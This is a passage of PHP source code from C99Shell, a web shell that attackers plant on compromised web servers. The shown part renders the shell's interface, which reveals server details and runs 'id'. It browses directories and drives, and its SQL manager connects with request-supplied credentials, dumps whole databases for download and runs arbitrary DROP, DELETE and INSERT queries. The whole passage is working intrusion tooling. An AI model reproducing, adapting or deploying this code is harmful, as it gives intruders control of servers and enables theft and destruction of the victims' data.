COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo " "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = false; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === false) {$free = 0;} + if ($total === false) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; +} +echo "<br>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = false;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td> <b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b> </td><td><b>Database</b> </td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"> <input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\") <b><sup>1</sup></b>:</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = true; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[ <b>Structure</b> ]</a> "; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[ <b>Browse</b> ]</a> "; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[ <b>Dump</b> ]</a> "; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[ <b>Insert</b> ]</a> "; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" 